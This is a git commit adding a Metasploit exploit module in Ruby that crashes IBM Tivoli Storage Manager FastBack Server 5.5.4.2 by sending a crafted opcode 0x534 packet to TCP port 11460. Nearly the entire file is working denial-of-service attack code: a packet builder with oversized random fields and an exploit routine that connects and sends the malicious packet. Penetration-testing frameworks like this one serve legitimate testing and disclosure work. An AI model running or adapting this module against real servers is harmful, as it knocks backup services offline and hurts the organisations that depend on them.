Add IBM TSM Fastback denial of service module

2016-02-08 14:36:14 -06:00 · 2016-02-08 14:36:14 -06:00 · 54566823f5
parent 37490a7b6b
commit 54566823f5
1 changed files with 96 additions and 0 deletions
--- a/modules/exploits/windows/misc/ibm_tsm_dos.rb
+++ b/modules/exploits/windows/misc/ibm_tsm_dos.rb
@ -0,0 +1,96 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service",
+      'Description'    => %q{
+                            This module exploits a denial of service condition present in IBM Tivoli Storage Manager FastBack Server
+                            when dealing with packets triggering the opcode 0x534 handler
+                            },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Gianni Gnesa', # Public disclosure/Proof of Concept
+          'William Webb <william_webb[at]rapid7.com>', # Metasploit
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://www.exploit-db.com/exploits/38979/']
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x00",
+        },
+      'DefaultOptions'  =>
+        {
+          'DisablePayloadHandler'   => 'true',
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          ['IBM Tivoli Storage Manager FastBack Server 5.5.4.2', {}],
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Dec 15 2015",
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          Opt::RPORT(11460)
+        ], self.class)
+  end
+
+  def tv_pkt(opcode, p1="", p2="", p3="")
+    buf = Rex::Text.rand_text_alpha(0x0C)
+    buf += [opcode].pack("V")
+    buf += [0x00].pack("V")
+    buf += [p1.length].pack("V")
+    buf += [p1.length].pack("V")
+    buf += [p2.length].pack("V")
+    buf += [p1.length + p2.length].pack("V")
+    buf += [p3.length].pack("V")
+
+    buf += Rex::Text.rand_text_alpha(0x08)
+
+    buf += p1
+    buf += p2
+    buf += p3
+
+    pkt = [buf.length].pack("N")
+    pkt << buf
+
+    return pkt
+  end
+
+  def exploit
+    ip    = datastore['RHOST']
+    port  = datastore['RPORT']
+
+    target_opcode = 0x534
+    connect
+    print_status("Connected to: #{datastore['RHOST'].to_s} port: #{datastore['RPORT']}")
+    print_status("Sending malicious packet")
+
+    p = tv_pkt(target_opcode,
+               p1 = "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % [Rex::Text.rand_text_alpha(0x200),0,0,0,0],
+               p2 = Rex::Text.rand_text_alpha(0x60),
+               p3 = Rex::Text.rand_text_alpha(0x60)
+              )
+
+    sock.put(p)
+    disconnect
+    print_status("Packet sent!")
+  rescue ::Exception => ex
+    print_status("Exploit failed: #{ex.class}: #{ex.message}")
+  end
+end